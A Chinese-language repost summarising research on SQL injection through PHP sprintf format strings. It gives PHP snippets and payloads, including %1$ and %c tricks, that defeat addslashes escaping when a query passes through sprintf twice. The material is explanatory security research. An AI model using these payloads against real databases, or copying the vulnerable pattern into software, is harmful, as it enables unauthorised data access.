码迷,mamicode.com
首页 > 其他好文 > 详细

sprintf格式化字符串带来的注入隐患

时间:2017-11-12 17:25:01      阅读:128      评论:0      收藏:0      [点我收藏+]

标签:wordpress   成功   closure   cti   div   name   col   字符   拼接   

原文链接:https://paper.seebug.org/386/

摘要点关键知识点

<?php

$input = addslashes("%1$‘ and 1=1#");
$b = sprintf("AND b=‘%s‘", $input);
...
$sql = sprintf("SELECT * FROM t WHERE a=‘%s‘ $b", ‘admin‘);
echo $sql;

通过fuzz得知,在php的格式化字符串中,%后的一个字符(除了‘%‘)会被当作字符类型,而被吃掉,单引号,斜杠\也不例外。

如果能提前将%‘ and 1=1#拼接入sql语句,若存在SQLi过滤,单引号会被转义成\‘

select * from user where username = ‘%\‘ and 1=1#‘;

然后这句sql语句如果继续进入格式化字符串,\会被%吃掉,成功逃逸

<?php
$sql = "select * from user where username = ‘%\‘ and 1=1#‘;";
$args = "admin";
echo sprintf( $sql, $args ) ;
//result: select * from user where username = ‘‘ and 1=1#‘
?>

还可以使用%1$吃掉后面的斜杠,而不引起报错

<?php
$sql = "select * from user where username = ‘%1$\‘ and 1=1#‘ and password=‘%s‘;";
$args = "admin";
echo sprintf( $sql, $args) ;
//result: select * from user where username = ‘‘ and 1=1#‘ and password=‘admin‘;
?>

国外安全研究人员Anthony Ferrara给出了另一种此漏洞的利用方式

<?php

$input1 = ‘%1$c) OR 1 = 1 /*‘;
$input2 = 39;
$sql = "SELECT * FROM foo WHERE bar IN (‘$input1‘) AND baz = %s";
$sql = sprintf($sql, $input2);
echo $sql;

%c起到了类似chr()的效果,将数字39转化为,从而导致了sql注入。

sprintf格式化字符串带来的注入隐患

标签:wordpress   成功   closure   cti   div   name   col   字符   拼接   

原文地址:http://www.cnblogs.com/test404/p/7821884.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!